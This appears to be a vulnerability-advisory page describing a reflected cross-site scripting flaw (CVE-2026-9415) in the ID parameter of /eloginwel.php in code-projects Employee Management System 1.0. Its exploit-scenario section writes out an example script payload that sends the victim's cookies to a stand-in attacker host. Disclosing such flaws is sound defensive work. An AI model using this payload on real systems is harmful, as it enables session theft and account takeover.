Skip to main content

Employee Management System EUVD-2026-31618

| CVE-2026-9415 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-05-25 VulDB GHSA-g4gr-rvff-wxc6
2.1
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

3
Analysis Generated
Jun 08, 2026 - 13:10 vuln.today
Severity Changed
May 26, 2026 - 20:07 NVD
MEDIUM LOW
CVSS changed
May 26, 2026 - 20:07 NVD
4.3 (MEDIUM) 2.1 (LOW)

DescriptionCVE.org

A weakness has been identified in code-projects Employee Management System 1.0. This affects an unknown function of the file /eloginwel.php. This manipulation of the argument ID causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks.

AnalysisAI

Reflected cross-site scripting in code-projects Employee Management System 1.0 allows remote unauthenticated attackers to inject and execute malicious scripts in a victim's browser via the ID parameter of /eloginwel.php. Exploitation requires user interaction (UI:P per CVSS 4.0), limiting automatable mass exploitation, though a publicly available proof-of-concept lowers the technical bar for targeted attacks. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Identify target running Employee Management System 1.0
Delivery
Craft malicious URL with XSS payload in ID parameter
Exploit
Deliver link to authenticated victim via phishing
Install
Victim clicks link, browser requests /eloginwel.php
C2
Unsanitized ID value reflected in HTTP response
Execute
Injected script executes in victim's browser session
Impact
Exfiltrate session token or perform unauthorized actions

Vulnerability AssessmentAI

Exploitation The CVSS 4.0 vector (PR:N) confirms no authentication is required to submit the malicious request to /eloginwel.php, meaning the attacker does not need credentials on the system. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The overall risk is low. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a malicious URL targeting /eloginwel.php with a JavaScript payload injected into the ID parameter - for example, appending ?ID=<script>document.location='http://attacker.com/steal?c='+document.cookie</script> - then delivers the link to an authenticated employee via phishing email or chat. When the victim clicks the link, their browser renders the unsanitized response and executes the attacker's script, potentially exfiltrating session cookies or performing actions on behalf of the victim within the application. …
Remediation No vendor-released patch has been identified at time of analysis; code-projects has not published a fix or advisory. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-31618 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy